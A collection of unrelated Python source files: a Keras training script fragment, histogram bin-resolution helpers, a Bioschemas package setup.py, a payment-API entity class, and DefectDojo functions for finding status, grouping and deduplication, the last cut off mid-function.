adam = Adam(lr=args.lr, beta_1=0.9, beta_2=0.999, epsilon=None, decay=1e-6, amsgrad=True)
output_keys = [node.op.name.split('/')[0] for node in unet_gcn.outputs]
print("Output Keys: ", output_keys)
if args.num_seg >0:
losses = [ mesh_loss_geometric_cf(mesh_info, 3, args.weights, args.cf_ratio, mesh_info['edge_length_scaled'][(i-1)%len(args.mesh_ids)]) for i in range(1, len(output_keys))]
losses = [binary_bce_dice_loss] + losses
else:
losses = [ mesh_loss_geometric_cf(mesh_info, 3, args.weights, args.cf_ratio, mesh_info['edge_length_scaled'][i%len(args.mesh_ids)]) for i in range(len(output_keys))]
losses = dict(zip(output_keys, losses))
metric_loss, metric_key = [], []
for i in range(1, len(args.mesh_ids)+1):
metric_key.append(output_keys[-i])
metric_loss.append(point_loss_cf)
metrics_losses = dict(zip(metric_key, metric_loss))
metric_loss_weights = list(np.ones(len(args.mesh_ids)))
loss_weights = list(np.ones(len(output_keys)))
if args.num_seg > 0:
loss_weights[0] = args.seg_weight
unet_gcn.compile(optimizer=adam, loss=losses,loss_weights=loss_weights, metrics=metrics_losses)
""" Setup model checkpoint """
save_model_path = os.path.join(args.output, "weights_gcn.hdf5")
cp_cd = SaveModelOnCD(metric_key, save_model_path, patience=50)
lr_schedule = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.8, patience=10, min_lr=0.000005)
call_backs = [cp_cd,lr_schedule]
try:
if args.pre_train != '':
unet_gcn.load_weights(args.pre_train)
else:
unet_gcn.load_weights(save_model_path)
except Exception as e:
print("Model not loaded", e)
""" Training """
history = unet_gcn.fit(train_ds,
steps_per_epoch=int(np.ceil(num_train_examples/float(args.batch_size))),
epochs=args.num_epoch,
validation_data=val_ds,
validation_steps= int(np.ceil(num_val_examples / float(args.batch_size))),
callbacks=call_backs)
with open(save_loss_path+"_history", 'wb') as handle: # saving the history
pickle.dump(history.history, handle)
|
import warnings
import numpy as np
from xentropy.internal.pre_post_processing import start_end_from_grid
def is_power_of_two(val):
"""This function will evaluate whether $val is
a power of two between 1 and 524288 or not.
Higher powers are not tested here.
Parameters
----------
val : numeric
Returns
-------
bool
"""
pows_of_two = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048,
4096, 8192, 16384, 32768, 65536, 131072, 262144, 524288]
# val = int(val) # this will cut off decimals, therefore example: int(16.6) in pows_of_two -> True
return val in pows_of_two
def next_power_of_two(val):
"""Returns the next higher power of two.
Parameters
----------
val : numeric
Returns
-------
pow_of_two : int
"""
return int(2**(np.log(val) // np.log(2) + 1))
def is_integer(resolution):
    # np.int / np.float were removed in NumPy 1.24; np.integer / np.floating
    # cover all sized variants (np.int32, np.int64, np.float32, ...)
    return isinstance(resolution, (int, np.integer))
def is_float(resolution):
    return isinstance(resolution, (float, np.floating))
def auto_dihedral_resolution(data):
data_size = len(data)
step = (np.sqrt(data_size*6)//64+1)*256
if not is_power_of_two(step):
step = next_power_of_two(step)
return np.min([int(step), 4096])
def minim_or_sqrt(data, minim=32):
return np.max([minim, square_root_choice(data)])
def interquartiles(data):
data = np.sort(data)
data_quarts = np.array_split(data, 4)
return data_quarts[1][0], data_quarts[-2][-1]
def scott(data):
bin_edges = np.histogram_bin_edges(data, bins="scott")
return len(bin_edges) - 1
def freedman_diaconis(data):
bin_edges = np.histogram_bin_edges(data, bins="fd")
return len(bin_edges)-1
def square_root_choice(data):
return int(np.ceil(np.sqrt(len(data))))
def sturges(data):
bin_edges = np.histogram_bin_edges(data, bins="sturges")
return len(bin_edges)-1
def doane(data):
bin_edges = np.histogram_bin_edges(data, bins="doane")
return len(bin_edges)-1
# below we have legacy functions, which we do not use
def silverman(data):
"""This is a legacy function"""
n_dat = len(data)
iqr = np.diff(interquartiles(data))[0]
either_or = np.min([np.std(data), iqr / 1.34])
return 0.9 * either_or * n_dat ** (-1 / 5)
def res_from_silverman(data):
"""This is a legacy function"""
start, end = start_end_from_grid(data)
data_range = end-start
predicted_bandw = silverman(data)
return data_range / predicted_bandw
def rules_of_thumb():
return {"auto": minim_or_sqrt,
"freedman_diaconis": freedman_diaconis, "fd": freedman_diaconis,
"sturges": sturges,
"doane": doane,
"sqrt": square_root_choice,
"scott": scott}
def rules_of_thumb_dihedral():
return {"auto": auto_dihedral_resolution,
"freedman_diaconis": freedman_diaconis, "fd": freedman_diaconis,
"sturges": sturges,
"doane": doane,
"sqrt": square_root_choice,
"scott": scott}
def resolution_from_rule_of_thumb(resolution, data, verbose=False, rules_of_thumb=rules_of_thumb()):
resolution = resolution.lower()
resolution = resolution.replace(" ", "_")
if not (resolution in list(rules_of_thumb.keys())):
err_msg = "Cannot interpret given argument for resolution. " \
"Give either an integer, or choose of the following:\n{}".format(rules_of_thumb.keys())
raise ValueError(err_msg)
data = np.squeeze(data) # you need to do this, because otherwise, you will have issues with single data sets...
squeezed_shape = data.shape
if len(squeezed_shape) == 1:
return rules_of_thumb[resolution](data)
elif len(squeezed_shape) == 2:
if verbose:
print("Found multiple data sets. Applying rule of thumb on all, and take the maximum resolution estimated.")
return np.max([rules_of_thumb[resolution](dat) for dat in data])
    else:  # TODO: data with more than two dimensions is not handled properly yet
print("Suspicious data shape...")
return 4096
def process_resolution_argument(resolution, data, rules_of_thumb=rules_of_thumb(), verbose=False):
"""Warns about potentially too high or too low
values and picks the next higher power of two,
if it was no power of two initially.
Parameters
----------
resolution
data
Returns
-------
"""
if isinstance(resolution, str):
resolution = resolution_from_rule_of_thumb(resolution, data, verbose=verbose, rules_of_thumb=rules_of_thumb)
# will be checked for whether it is a power of two or not below
elif is_integer(resolution):
pass
elif is_float(resolution):
print("Resolution is not of type int. Trying to cast it to int...")
resolution = int(resolution)
else:
err_msg = "Cannot interpret given argument for resolution:\n{}\n" \
"Please give either a single integer or a string.".format(resolution)
raise ValueError(err_msg)
if resolution < 100:
warn_msg = "You are using a rather small resolution. " \
"This may potentially lead to inaccurate results..."
warnings.warn(warn_msg, RuntimeWarning)
elif resolution > 10000:
warn_msg = "You are using a rather large resolution. " \
"Amongst other things, this may potentially lead to very long runtimes " \
"without necessarily improving the accuracy of the result..."
warnings.warn(warn_msg, RuntimeWarning)
if not is_power_of_two(resolution):
resolution = next_power_of_two(resolution)
return resolution
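# Minimal usage sketch (an illustrative assumption, not part of the module):
# any 1-D or 2-D array works, and a string argument selects a rule of thumb.
#   rng = np.random.default_rng(0)
#   data = rng.normal(size=1000)
#   res = process_resolution_argument("scott", data, verbose=True)
#   # res is the estimated bin count, rounded up to the next power of two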
|
CACHE_SIZE = 256
|
#!/usr/bin/env python
# SPDX-License-Identifier: MIT
# Copyright 2020 Heriot-Watt University, UK
# Copyright 2020 The University of Manchester, UK
#
__author__ = "Bioschemas.org community"
__copyright__ = """© 2020 Heriot-Watt University, UK
© 2020 The University of Manchester, UK
"""
__license__ = "MIT" # https://spdx.org/licenses/MIT
from setuptools import setup, find_packages
from codecs import open
from os import path
import re
# https://www.python.org/dev/peps/pep-0440/#appendix-b-parsing-version-strings-with-regular-expressions # noqa
PEP440_PATTERN = r"([1-9][0-9]*!)?(0|[1-9][0-9]*)(\.(0|[1-9][0-9]*))*((a|b|rc)(0|[1-9][0-9]*))?(\.post(0|[1-9][0-9]*))?(\.dev(0|[1-9][0-9]*))?" # noqa
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
with open(path.join(here, 'requirements.txt'), encoding='utf-8') as f:
required = f.read().splitlines()
with open(path.join(here, 'profilegenerator', '_version.py'), encoding='utf-8') as f:
# "parse" rocrate/_version.py which MUST have this pattern
# __version__ = "0.1.1"
# see https://www.python.org/dev/peps/pep-0440
v = f.read().strip()
m = re.match(r'^__version__ = "(' + PEP440_PATTERN + ')"$', v)
if not m:
        msg = ('profilegenerator/_version.py did not match pattern '
'__version__ = "0.1.2" (see PEP440):\n') + v
raise Exception(msg)
__version__ = m.group(1)
setup(
name='profilegenerator',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
    version=__version__,  # update in profilegenerator/_version.py
description='BioSchemas Profile Generator',
long_description_content_type='text/markdown',
long_description=long_description,
author=('Alasdair J G Gray, Stian Soiland-Reyes'),
python_requires='>=3.6',
author_email='public-bioschemas@w3.org',
package_data={'': ['data/*.jsonld', 'templates/*.j2']},
license="MIT",
url='https://github.com/bioschemas/ProfileGenerator/',
download_url=('https://github.com/bioschemas/ProfileGenerator/archive/'
f'{__version__}.tar.gz'),
keywords="bioschemas schema.org jekyll profile",
    install_requires=required,
test_suite='test',
entry_points={
'console_scripts': ["bioschemas-profilegen=profilegenerator.main:main",
"schemaorg-example=profilegenerator.schemaorg:main"]
},
classifiers=[
'Operating System :: OS Independent',
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Database',
'Topic :: Internet',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Topic :: Software Development :: Code Generators',
'Topic :: Utilities',
],
)
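# Illustrative local workflow (an assumption, not part of this file): running
# `pip install .` from the repository root installs the package and exposes the
# console scripts `bioschemas-profilegen` and `schemaorg-example` declared in
# entry_points above.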
|
# -*- coding: utf-8 -*-
from .datatype import *
from junopy.utils.juno import *
__methods__ = ['toJSON', 'load', 'add', 'Create', 'Update', 'Get',
'Delete', 'Deactivate', 'Reactivate', 'Cancel', 'Complete', 'SendFiles']
def EncodeValue(o, format=None):
    """Convert a value into a JSON-serializable representation."""
    if hasattr(o, 'toJSON'):
        return o.toJSON()
    if isinstance(o, decimal.Decimal):
        return float(o)
    if isinstance(o, datetime.datetime):
        # fall back to ISO format when no explicit strftime format is given
        return o.isoformat() if format in (None, 'iso') else o.strftime(format)
    if isinstance(o, bytes):
        return o.decode('utf-8')
    return o
class JunoEntity():
def __init__(self, aliases=None, context=None, **kw):
self.__metadata__['data'] = {}
self.__metadata__['relasionships'] = {}
self.__context__ = context
self.load(**kw)
def load(self, **kw):
if len(kw) > 0:
for k in self.__dict__:
try:
if not k.startswith("__"):
if k in kw:
if self[k].__class__.__name__.startswith("Obj"):
self.add(k, kw[k])
else:
self[k].value = kw[k]
self.__metadata__['data'][k] = EncodeValue(
self[k].value, self[k].format)
except Exception as e:
raise Exception(f"Field [{k}] Value [{kw[k]}] Error : {e}")
def add(self, key=None, data=None):
if key and data and (isinstance(data, dict) or isinstance(data, list)):
if "List" in self[key].__class__.__name__:
if not key in self.__metadata__['relasionships']:
self.__metadata__['relasionships'][key] = []
self.__metadata__['relasionships'][key].extend(
data if isinstance(data, list) else [data])
if hasattr(data, 'values'):
self[key].value.extend([self[key].type(context={'entity': self, 'key': key}, **item) for item in data if any(item.values(
))] if isinstance(data, list) else [self[key].type(context={'entity': self, 'key': key}, **data)] if any(data.values()) else [])
elif isinstance(data, list):
self[key].value.extend([self[key].type(item) if isinstance(item, str) or isinstance(
item, int) else self[key].type(context={'entity': self, 'key': key}, **item) for item in data if not item is None])
else:
data = data[0] if isinstance(data, list) else data
if any(data.values()):
self.__metadata__['relasionships'][key] = data
self[key].value = self[key].type(context={'entity': self, 'key': key}, **data)
elif hasattr(data, '__class__') and data.__class__.__name__ == self[key].type.__name__:
self.__setattr__(key, data)
else:
raise Exception("entity.add requires key and dict of object data")
def __getitem__(self, field):
return super().__getattribute__(field) if hasattr(self, field) else None
def __getattribute__(self, field):
if field.startswith("__") or field in __methods__:
return super().__getattribute__(field)
else:
return super().__getattribute__(field).value
def __setattr__(self, item, value):
try:
if not item.startswith("__") and not "entity.datatype" in str(value.__class__):
if self[item]:
if hasattr(value, '__context__') and not value.__context__:
value.__context__ = self
self[item].value = value
self.__metadata__['data'][item] = EncodeValue(
self[item].value, self[item].format)
if self.__context__:
_context = self.__context__['entity']
_context_key = self.__context__['key']
if isinstance(_context[_context_key].value, list):
index = _context[_context_key].value.index(self)
_context.__metadata__[
'relasionships'][_context_key][index] = self.__metadata__['data']
else:
_context.__metadata__[
'relasionships'][_context_key] = self.__metadata__['data']
else:
super().__setattr__(item, value)
else:
super().__setattr__(item, value)
except Exception as e:
raise Exception(f"Field [{item}] Value [{value}] Error : {e}")
def toJSON(self):
try:
return {**self.__metadata__['data'], **self.__metadata__['relasionships']}
except Exception as e:
raise e
    def Create(self, resourceToken=None):
        if hasattr(self, '__route__'):
            additional_header = None
            if resourceToken is not None:
                additional_header = {'resourceToken': resourceToken}
            data = Post(self.__route__, self.toJSON(), additional_header)
            self.load(**data)
        else:
            raise Exception("Method Create not allowed for this object")
        return self
def Update(self):
if hasattr(self, '__route__'):
route = self.__route__
if hasattr(self, '__requireid__'):
if self.__requireid__ == True and self.id is None:
raise Exception("ID object required")
if self.id is not None and self.__requireid__ == True:
route = f"{route}/{self.id}"
self.id = None
data = Patch(route, self.toJSON())
self.load(**data)
else:
raise Exception("Method Update not allowed this object")
return self
def Get(self):
if hasattr(self, '__route__'):
route = self.__route__
if hasattr(self, '__requireid__'):
if self.__requireid__ == True and self.id is None:
raise Exception("ID object required")
route = f"{route}/{self.id}"
data = Get(route, {'resourceToken': self.resourceToken} if hasattr(
self, 'resourceToken') and not self.resourceToken is None else None)
self.load(**data)
else:
raise Exception("Method Get not allowed this object")
return self
def Delete(self):
if hasattr(self, '__route__'):
route = self.__route__
if hasattr(self, '__requireid__') and self.__requireid__ == True:
if self.id is None:
raise Exception("ID object required")
route = f"{route}/{self.id}"
Delete(route)
        else:
            raise Exception("Method Delete not allowed for this object")
        return None
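# Illustrative flow (assumes a concrete junopy entity subclass that defines
# __route__ and typed fields; `Charge` here is a hypothetical example):
#   charge = Charge(amount=100, description="Order #1")  # load() maps kwargs to fields
#   charge.Create()   # POSTs charge.toJSON() to charge.__route__
#   charge.Update()   # PATCHes, appending /{id} when __requireid__ is set
#   charge.Delete()   # DELETEs and returns None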
|
from .common import experimental
from .pep542_testfile import *
|
from django.db.models.query_utils import Q
from django.db.models.signals import post_delete, pre_delete
from django.dispatch.dispatcher import receiver
from dojo.celery import app
from dojo.decorators import dojo_async_task, dojo_model_from_id, dojo_model_to_id
import logging
from time import strftime
from django.utils import timezone
from django.conf import settings
from fieldsignals import pre_save_changed
from dojo.utils import get_current_user, mass_model_updater, to_str_typed
from dojo.models import Engagement, Finding, Finding_Group, System_Settings, Test
logger = logging.getLogger(__name__)
deduplicationLogger = logging.getLogger("dojo.specific-loggers.deduplication")
OPEN_FINDINGS_QUERY = Q(active=True)
VERIFIED_FINDINGS_QUERY = Q(active=True, verified=True)
OUT_OF_SCOPE_FINDINGS_QUERY = Q(active=False, out_of_scope=True)
FALSE_POSITIVE_FINDINGS_QUERY = Q(active=False, duplicate=False, false_p=True)
INACTIVE_FINDINGS_QUERY = Q(active=False, duplicate=False, is_mitigated=False, false_p=False, out_of_scope=False)
ACCEPTED_FINDINGS_QUERY = Q(risk_accepted=True)
NOT_ACCEPTED_FINDINGS_QUERY = Q(risk_accepted=False)
WAS_ACCEPTED_FINDINGS_QUERY = Q(risk_acceptance__isnull=False) & Q(risk_acceptance__expiration_date_handled__isnull=False)
CLOSED_FINDINGS_QUERY = Q(is_mitigated=True)
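# Illustrative composition (an assumption, not used below): these Q objects are
# meant to be combined on Finding querysets, e.g.
#   Finding.objects.filter(OPEN_FINDINGS_QUERY & ~ACCEPTED_FINDINGS_QUERY)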
# this signal is triggered just before a finding is getting saved
# and one of the status related fields has changed
# this allows us to:
# - set any depending fields such as mitigated_by, mitigated, etc.
# - update any audit log / status history
def pre_save_finding_status_change(sender, instance, changed_fields=None, **kwargs):
# some code is cloning findings by setting id/pk to None, ignore those, will be handled on next save
# if not instance.id:
# logger.debug('ignoring save of finding without id')
# return
logger.debug('%i: changed status fields pre_save: %s', instance.id or 0, changed_fields)
for field, (old, new) in changed_fields.items():
logger.debug("%i: %s changed from %s to %s" % (instance.id or 0, field, old, new))
user = None
if get_current_user() and get_current_user().is_authenticated:
user = get_current_user()
update_finding_status(instance, user, changed_fields)
# also get signal when id is set/changed so we can process new findings
pre_save_changed.connect(pre_save_finding_status_change, sender=Finding, fields=['id', 'active', 'verified', 'false_p', 'is_mitigated', 'mitigated', 'mitigated_by', 'out_of_scope', 'risk_accepted'])
# pre_save_changed.connect(pre_save_finding_status_change, sender=Finding)
# post_save_changed.connect(pre_save_finding_status_change, sender=Finding, fields=['active', 'verified', 'false_p', 'is_mitigated', 'mitigated', 'mitigated_by', 'out_of_scope'])
def update_finding_status(new_state_finding, user, changed_fields=None):
now = timezone.now()
logger.debug('changed fields: %s', changed_fields)
is_new_finding = not changed_fields or (changed_fields and len(changed_fields) == 1 and 'id' in changed_fields)
# activated
# reactivated
# closed / mitigated
# false positivized
# out_of_scopified
# marked as duplicate
# marked as original
if is_new_finding or 'is_mitigated' in changed_fields:
# finding is being mitigated
if new_state_finding.is_mitigated:
            # when mitigating a finding, the meta fields can only be edited if allowed
logger.debug('finding being mitigated, set mitigated and mitigated_by fields')
if can_edit_mitigated_data(user):
# only set if it was not already set by user
# not sure if this check really covers all cases, but if we make it more strict
# it will cause all kinds of issues I believe with new findings etc
new_state_finding.mitigated = new_state_finding.mitigated or now
new_state_finding.mitigated_by = new_state_finding.mitigated_by or user
# finding is being "un"mitigated
else:
new_state_finding.mitigated = None
new_state_finding.mitigated_by = None
# people may try to remove mitigated/mitigated_by by accident
if new_state_finding.is_mitigated:
new_state_finding.mitigated = new_state_finding.mitigated or now
new_state_finding.mitigated_by = new_state_finding.mitigated_by or user
if is_new_finding or 'active' in changed_fields:
# finding is being (re)activated
if new_state_finding.active:
new_state_finding.false_p = False
new_state_finding.out_of_scope = False
new_state_finding.is_mitigated = False
new_state_finding.mitigated = None
new_state_finding.mitigated_by = None
else:
# finding is being deactivated
pass
if is_new_finding or 'verified' in changed_fields:
pass
if is_new_finding or 'false_p' in changed_fields or 'out_of_scope' in changed_fields:
# existing behaviour is that false_p or out_of_scope implies mitigated
if new_state_finding.false_p or new_state_finding.out_of_scope:
new_state_finding.mitigated = new_state_finding.mitigated or now
new_state_finding.mitigated_by = new_state_finding.mitigated_by or user
new_state_finding.is_mitigated = True
new_state_finding.active = False
new_state_finding.verified = False
# always reset some fields if the finding is not a duplicate
if not new_state_finding.duplicate:
new_state_finding.duplicate = False
new_state_finding.duplicate_finding = None
new_state_finding.last_status_update = now
def can_edit_mitigated_data(user):
return settings.EDITABLE_MITIGATED_DATA and user.is_superuser
def create_finding_group(finds, finding_group_name):
    logger.debug('creating finding group')
    if not finds:
        raise ValueError('cannot create empty Finding Group')
finding_group_name_dummy = 'bulk group ' + strftime("%a, %d %b %Y %X", timezone.now().timetuple())
finding_group = Finding_Group(test=finds[0].test)
finding_group.creator = get_current_user()
    finding_group.name = (finding_group_name or '') + finding_group_name_dummy  # tolerate a missing name; the dummy suffix keeps it unique
finding_group.save()
available_findings = [find for find in finds if not find.finding_group_set.all()]
finding_group.findings.set(available_findings)
# if user provided a name, we use that, else:
# if we have components, we may set a nice name but catch 'name already exist' exceptions
try:
if finding_group_name:
finding_group.name = finding_group_name
elif finding_group.components:
finding_group.name = finding_group.components
finding_group.save()
    except Exception:
        # the group name may already exist; keep the unique dummy name in that case
        pass
added = len(available_findings)
skipped = len(finds) - added
return finding_group, added, skipped
def add_to_finding_group(finding_group, finds):
added = 0
skipped = 0
available_findings = [find for find in finds if not find.finding_group_set.all()]
finding_group.findings.add(*available_findings)
added = len(available_findings)
skipped = len(finds) - added
return finding_group, added, skipped
def remove_from_finding_group(finds):
removed = 0
skipped = 0
affected_groups = set()
for find in finds:
groups = find.finding_group_set.all()
if not groups:
skipped += 1
continue
for group in find.finding_group_set.all():
group.findings.remove(find)
affected_groups.add(group)
removed += 1
return affected_groups, removed, skipped
def update_finding_group(finding, finding_group):
# finding_group = Finding_Group.objects.get(id=group)
if finding_group is not None:
if finding_group != finding.finding_group:
if finding.finding_group:
logger.debug('removing finding %d from finding_group %s', finding.id, finding.finding_group)
finding.finding_group.findings.remove(finding)
logger.debug('adding finding %d to finding_group %s', finding.id, finding_group)
finding_group.findings.add(finding)
else:
if finding.finding_group:
logger.debug('removing finding %d from finding_group %s', finding.id, finding.finding_group)
finding.finding_group.findings.remove(finding)
def get_group_by_group_name(finding, finding_group_by_option):
if finding_group_by_option == 'component_name':
group_name = finding.component_name if finding.component_name else 'None'
elif finding_group_by_option == 'component_name+component_version':
group_name = '%s:%s' % ((finding.component_name if finding.component_name else 'None'),
(finding.component_version if finding.component_version else 'None'))
elif finding_group_by_option == 'file_path':
group_name = 'Filepath %s' % (finding.file_path if finding.file_path else 'None')
else:
raise ValueError("Invalid group_by option %s" % finding_group_by_option)
return 'Findings in: %s' % group_name
def group_findings_by(finds, finding_group_by_option):
grouped = 0
groups_created = 0
groups_existing = 0
skipped = 0
affected_groups = set()
for find in finds:
if find.finding_group is not None:
skipped += 1
continue
group_name = get_group_by_group_name(find, finding_group_by_option)
finding_group = Finding_Group.objects.filter(name=group_name).first()
if not finding_group:
            finding_group, added, group_skipped = create_finding_group([find], group_name)
            groups_created += 1
            grouped += added
            skipped += group_skipped
else:
add_to_finding_group(finding_group, [find])
groups_existing += 1
grouped += 1
affected_groups.add(finding_group)
return affected_groups, grouped, skipped, groups_created
def add_finding_to_auto_group(finding, group_by):
test = finding.test
name = get_group_by_group_name(finding, group_by)
finding_group, created = Finding_Group.objects.get_or_create(test=test, creator=get_current_user(), name=name)
if created:
logger.debug('Created Finding Group %d:%s for test %d:%s', finding_group.id, finding_group, test.id, test)
finding_group.findings.add(finding)
@dojo_model_to_id
@dojo_async_task
@app.task
@dojo_model_from_id
def post_process_finding_save(finding, dedupe_option=True, false_history=False, rules_option=True, product_grading_option=True,
issue_updater_option=True, push_to_jira=False, user=None, *args, **kwargs):
system_settings = System_Settings.objects.get()
# STEP 1 run all status changing tasks sequentially to avoid race conditions
if dedupe_option:
if finding.hash_code is not None:
if system_settings.enable_deduplication:
from dojo.utils import do_dedupe_finding
do_dedupe_finding(finding, *args, **kwargs)
else:
deduplicationLogger.debug("skipping dedupe because it's disabled in system settings")
else:
deduplicationLogger.warning("skipping dedupe because hash_code is None")
if false_history:
if system_settings.false_positive_history:
from dojo.utils import do_false_positive_history
do_false_positive_history(finding, *args, **kwargs)
else:
deduplicationLogger.debug("skipping false positive history because it's disabled in system settings")
# STEP 2 run all non-status changing tasks as celery tasks in the background
if issue_updater_option:
from dojo.tools import tool_issue_updater
tool_issue_updater.async_tool_issue_update(finding)
if product_grading_option:
if system_settings.enable_product_grade:
from dojo.utils import calculate_grade
calculate_grade(finding.test.engagement.product)
else:
deduplicationLogger.debug("skipping product grading because it's disabled in system settings")
# Adding a snippet here for push to JIRA so that it's in one place
if push_to_jira:
logger.debug('pushing finding %s to jira from finding.save()', finding.pk)
import dojo.jira_link.helper as jira_helper
# current approach is that whenever a finding is in a group, the group will be pushed to JIRA
        # based on feedback we could introduce another push_group_to_jira boolean everywhere
# but what about the push_all boolean? Let's see how this works for now and get some feedback.
if finding.has_jira_issue or not finding.finding_group:
jira_helper.push_to_jira(finding)
elif finding.finding_group:
jira_helper.push_to_jira(finding.finding_group)
@receiver(pre_delete, sender=Finding)
def finding_pre_delete(sender, instance, **kwargs):
logger.debug('finding pre_delete: %d', instance.id)
# this shouldn't be necessary as Django should remove any Many-To-Many entries automatically, might be a bug in Django?
# https://code.djangoproject.com/ticket/154
instance.found_by.clear()
instance.status_finding.clear()
def finding_delete(instance, **kwargs):
logger.debug('finding delete, instance: %s', instance.id)
    # the idea is that the engagement/test pre delete already prepared all the duplicates inside
    # the test/engagement to no longer point to any original so they can be safely deleted.
    # so if we still find that the finding that is going to be deleted is an original, it is either
    # a manual / single finding delete, or a bulk delete of findings
    # in which case we have to process all the duplicates
    # TODO: should we add the preprocessing also to the bulk edit form?
logger.debug('finding_delete: refresh from db: pk: %d', instance.pk)
try:
instance.refresh_from_db()
except Finding.DoesNotExist:
# due to cascading deletes, the current finding could have been deleted already
# but django still calls delete() in this case
return
duplicate_cluster = instance.original_finding.all()
if duplicate_cluster:
reconfigure_duplicate_cluster(instance, duplicate_cluster)
else:
logger.debug('no duplicate cluster found for finding: %d, so no need to reconfigure', instance.id)
# this shouldn't be necessary as Django should remove any Many-To-Many entries automatically, might be a bug in Django?
# https://code.djangoproject.com/ticket/154
logger.debug('finding delete: clearing found by')
instance.found_by.clear()
instance.status_finding.clear()
@receiver(post_delete, sender=Finding)
def finding_post_delete(sender, instance, **kwargs):
logger.debug('finding post_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
# calculate_grade(instance.test.engagement.product)
def reset_duplicate_before_delete(dupe):
dupe.duplicate_finding = None
dupe.duplicate = False
def reset_duplicates_before_delete(qs):
mass_model_updater(Finding, qs, lambda f: reset_duplicate_before_delete(f), fields=['duplicate', 'duplicate_finding'])
def set_new_original(finding, new_original):
if finding.duplicate:
finding.duplicate_finding = new_original
# can't use model to id here due to the queryset
# @dojo_async_task
# @app.task
def reconfigure_duplicate_cluster(original, cluster_outside):
    # when a finding is deleted, and is an original of a duplicate cluster, we have to choose a new original for the cluster
# only look for a new original if there is one outside this test
if original is None or cluster_outside is None or len(cluster_outside) == 0:
return
if settings.DUPLICATE_CLUSTER_CASCADE_DELETE:
cluster_outside.order_by('-id').delete()
else:
logger.debug('reconfigure_duplicate_cluster: cluster_outside: %s', cluster_outside)
# set new original to first finding in cluster (ordered by id)
new_original = cluster_outside.order_by('id').first()
if new_original:
logger.debug('changing original of duplicate cluster %d to: %s:%s', original.id, new_original.id, new_original.title)
new_original.duplicate = False
new_original.duplicate_finding = None
new_original.active = True
new_original.save_no_options()
new_original.found_by.set(original.found_by.all())
# if the cluster is size 1, there's only the new original left
if new_original and len(cluster_outside) > 1:
# for find in cluster_outside:
# if find != new_original:
# find.duplicate_finding = new_original
# find.save_no_options()
mass_model_updater(Finding, cluster_outside, lambda f: set_new_original(f, new_original), fields=['duplicate_finding'])
def prepare_duplicates_for_delete(test=None, engagement=None):
logger.debug('prepare duplicates for delete, test: %s, engagement: %s', test.id if test else None, engagement.id if engagement else None)
if test is None and engagement is None:
        logger.warning('nothing to prepare as test and engagement are None')
fix_loop_duplicates()
# get all originals in the test/engagement
originals = Finding.objects.filter(original_finding__isnull=False)
if engagement:
originals = originals.filter(test__engagement=engagement)
if test:
originals = originals.filter(test=test)
# use distinct to flatten the join result
originals = originals.distinct()
if len(originals) == 0:
logger.debug('no originals found, so no duplicates to prepare for deletion of original')
return
# remove the link to the original from the duplicates inside the cluster so they can be safely deleted by the django framework
total = len(originals)
i = 0
# logger.debug('originals: %s', [original.id for original in originals])
for original in originals:
i += 1
logger.debug('%d/%d: preparing duplicate cluster for deletion of original: %d', i, total, original.id)
cluster_inside = original.original_finding.all()
if engagement:
cluster_inside = cluster_inside.filter(test__engagement=engagement)
if test:
cluster_inside = cluster_inside.filter(test=test)
if len(cluster_inside) > 0:
reset_duplicates_before_delete(cluster_inside)
# reconfigure duplicates outside test/engagement
cluster_outside = original.original_finding.all()
if engagement:
cluster_outside = cluster_outside.exclude(test__engagement=engagement)
if test:
cluster_outside = cluster_outside.exclude(test=test)
if len(cluster_outside) > 0:
reconfigure_duplicate_cluster(original, cluster_outside)
logger.debug('done preparing duplicate cluster for deletion of original: %d', original.id)
@receiver(pre_delete, sender=Test)
def test_pre_delete(sender, instance, **kwargs):
logger.debug('test pre_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
prepare_duplicates_for_delete(test=instance)
@receiver(post_delete, sender=Test)
def test_post_delete(sender, instance, **kwargs):
logger.debug('test post_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
@receiver(pre_delete, sender=Engagement)
def engagement_pre_delete(sender, instance, **kwargs):
logger.debug('engagement pre_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
prepare_duplicates_for_delete(engagement=instance)
@receiver(post_delete, sender=Engagement)
def engagement_post_delete(sender, instance, **kwargs):
logger.debug('engagement post_delete, sender: %s instance: %s', to_str_typed(sender), to_str_typed(instance))
def fix_loop_duplicates():
""" Due to bugs in the past and even currently when under high parallel load, there can be transitive duplicates. """
""" i.e. A -> B -> C. This can lead to problems when deleting findingns, performing deduplication, etc """
candidates = Finding.objects.filter(duplicate_finding__isnull=False, original_finding__isnull=False).order_by("-id")
loop_count = len(candidates)
if loop_count > 0:
deduplicationLogger.info("Identified %d Findings with Loops" % len(candidates))
for find_id in candidates.values_list('id', flat=True):
removeLoop(find_id, 50)
new_originals = Finding.objects.filter(duplicate_finding__isnull=True, duplicate=True)
for f in new_originals:
deduplicationLogger.info("New Original: %d " % f.id)
f.duplicate = False
super(Finding, f).save()
loop_count = Finding.objects.filter(duplicate_finding__isnull=False, original_finding__isnull=False).count()
deduplicationLogger.info("%d Finding found which still has Loops, please run fix loop duplicates again" % loop_count)
return loop_count
def removeLoop(finding_id, counter):
# get latest status
finding = Finding.objects.get(id=finding_id)
real_original = finding.duplicate_finding
    if real_original is None:
# loop fully removed
return
# duplicate of itself -> clear duplicate status
if finding_id == real_original.id:
# loop fully removed
finding.duplicate_finding = None
# duplicate remains True, will be set to False in fix_loop_duplicates (and logged as New Original?).
super(Finding, finding).save()
return
# Only modify the findings if the original ID is lower to get the oldest finding as original
if (real_original.id > finding_id) and (real_original.duplicate_finding is not None):
# If not, swap them around
tmp = finding_id
finding_id = real_original.id
real_original = Finding.objects.get(id=tmp)
finding = Finding.objects.get(id=finding_id)
if real_original in finding.original_finding.all():
